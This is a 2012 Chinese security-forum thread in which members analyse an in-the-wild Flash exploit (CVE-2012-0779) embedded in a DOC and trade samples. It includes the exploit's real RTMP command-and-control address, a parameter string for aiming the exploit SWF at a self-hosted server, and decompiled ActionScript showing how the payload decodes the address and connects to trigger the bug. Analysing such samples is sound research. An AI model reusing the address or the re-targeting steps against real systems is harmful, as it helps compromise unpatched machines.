首页
社区
课程
招聘
[讨论]分析
发表于: 2012-5-5 17:05 16525

[讨论]分析

2012-5-5 17:05
16525
收藏
免费 0
支持
分享
最新回复 (22)
雪    币: 859
活跃值: (304)
能力值: ( LV11,RANK:180 )
在线值:
发帖
回帖
粉丝
2
正等呢。。。求样本。。。

资料链接一个

http://www.symantec.com/connect/blogs/targeted-attacks-using-confusion-cve-2012-0779
2012-5-5 19:47
0
雪    币: 1491
活跃值: (975)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
3
能给DOC的样本也可以撒。
2012-5-6 22:31
0
雪    币: 106
活跃值: (40)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
唉 到处都是求样本的
2012-5-7 10:39
0
雪    币: 1491
活跃值: (975)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
5
样本附加上去了。。真快,真有样本了
2012-5-7 11:50
0
雪    币: 1534
活跃值: (743)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
6
附件中密码是什么
2012-5-7 12:25
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
求第二个附件的样本密码
2012-5-7 12:37
0
雪    币: 433
活跃值: (1875)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
8
Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.
2012-5-7 12:49
0
雪    币: 1491
活跃值: (975)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
9
我也在找,搭车同求
2012-5-7 13:06
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
第一个样本 只是看见了堆喷射 且有shellcode但 最终没触发。。
2012-5-7 13:54
0
雪    币: 240
活跃值: (29)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
sample without password
上传的附件:
2012-5-7 14:24
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
悲催 换了好几个版本的flash了 不触发
2012-5-7 14:28
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
不触发的原因应该是你连不上
rtmp://126.19.84.7:8080/RPCCheckPassword
2012-5-7 14:44
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
那怎么弄啊  能否简单教下
2012-5-7 14:49
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15

怕误导你,不敢乱说

exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000

他原来的info是126.19.84.7:8080
自己搭建一个rmtp://,然后info=zlib(你自己的地址)

infosize那个是原DOC一个标记的地址可以不用管
2012-5-7 14:56
0
雪    币: 234
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
这个flash文件用doswf加了密的.....
2012-5-7 15:08
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000  这串是什么啊
没明白大牛的这番话。
那个IP地址又是从哪来的呢
2012-5-7 15:11
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
doc获取的URL.

SWF里调用那个参数
var _local1:Object = root.loaderInfo.parameters;
            var _local2:String = _local1["info"];
            var _local3:ByteArray = hexToBin(_local2);
            var _local4:uint;
            _local4 = 0;
            while (_local4 < _local3.length)
            {
                _local3[_local4] = (_local3[_local4] ^ 0);
                _local4++;
            };
            _local3.uncompress();
            var _local5:String = String(_local3);
            _fun1(_local5);

// _fun1 (_arg1:String)
this._local1 = new NetConnection();
            var _local2 = "rtmp://";
            var _local3 = "/RPCCheckPassword";
            var _local4:String = ((_local2 + _arg1) + _local3);
            this._local1.connect(_local4);
            this._local1.call("systemMemoryCall", this._local5, "argc");
2012-5-7 15:36
0
雪    币: 105
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
膜拜,楼上已经解出来了。
2012-5-7 15:43
0
雪    币: 146
活跃值: (182)
能力值: ( LV13,RANK:220 )
在线值:
发帖
回帖
粉丝
20
膜拜  大东
2012-5-7 15:49
0
雪    币: 1491
活跃值: (975)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
21
膜拜啊。。真厉害
2012-5-7 15:53
0
雪    币: 146
活跃值: (182)
能力值: ( LV13,RANK:220 )
在线值:
发帖
回帖
粉丝
22
[QUOTE=大东;1070305]doc获取的URL.

SWF里调用那个参数
var _local1:Object = root.loaderInfo.parameters;
            var _local2:String = _local1["info"];
            var _loc...[/QUOTE]

dadong 隐藏的高手啊
2012-5-7 15:53
0
雪    币: 1491
活跃值: (975)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
23
请教是如何解密的?
2012-5-7 15:54
0
游客
登录 | 注册 方可回帖
返回
//